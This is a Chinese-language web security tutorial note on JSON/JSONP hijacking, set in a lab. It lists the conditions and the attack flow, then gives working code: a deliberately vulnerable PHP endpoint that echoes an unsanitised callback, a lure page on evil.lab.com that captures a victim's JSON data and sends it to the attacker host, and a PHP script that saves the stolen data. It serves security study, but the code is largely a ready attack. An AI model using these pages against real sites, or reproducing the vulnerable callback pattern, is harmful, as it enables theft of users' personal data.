WEB安全之:Json 劫持
郑重声明:
本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。
Json 劫持
1 利用条件
- 返回敏感的数据
- 返回一个JSON数组
- 响应一个GET请求
- 发送请求的浏览器启用了 JavaScript
- 发送请求的浏览器支持
__defineSetter__方法
2 攻击流程
- 用户浏览器上保存了 HTTP 的身份认证信息和相关的cookie缓存
- 用户点击了恶意的链接,此时用户的浏览器会向恶意的网站发送 GET 请求
- 恶意网站响应用户的请求并返回恶意 JavaScript 语句,当用户的浏览器运行这些 JavaScript 语句时,它就会执行这段代码,访问目标网站,并将数据发送给恶意网站
- 恶意网站处理收到的 Json 数据
3 实例
3.1 收集信息
查找存在 json 类型页面:构造 json 类型页面 json.php
<?php
header('Content-type: application/json');
$callback = $_GET['callback'];
print $callback.'({"id" : "1","username" : "user01","email":"user01@lab.com"});';
?>
3.2 恶意服务器构造恶意页面
恶意服务器,evil.lab.com
3.2.1 测试恶意服务器是否能正常获取 Json 数据
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>json 数据获取测试</title>
<script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"></script>
</head>
<body>
<script>function get_json(data){alert(JSON.stringify(data));}</script>
<script src="http://json.lab.com/json.php?callback=get_json"></script>
</body>
</html>
3.2.2 劫持 Json 数据
构造诱使用户点击的页面,evil.lab.com/json_hijack.html
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>json hijack</title>
<script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"></script>
<script>
function json_hijack(data){
var xmlhttp = new XMLHttpRequest();
var url = "http://evil.lab.com/save_json.php?file=" + JSON.stringify(data);
xmlhttp.open("GET",url,true);
xmlhttp.send();
}
</script>
<script src="http://json.lab.com/json.php?callback=json_hijack"></script>
</head>
<body>
</body>
</html>
3.2.3 恶意服务器处理接收的 Json 数据
save_json.php 用于保存劫持的 json 数据
<?php
if($_GET['file']){
file_put_contents('json.txt',$_GET['file']);
}
?>
3.3 诱便用户点击
当用户点击 evil.lab.com/json_hijack.html 后,会将数据发送到远程的恶意服务器上,调用 save_json.php ,将接收的数据保存并生成 json.txt。
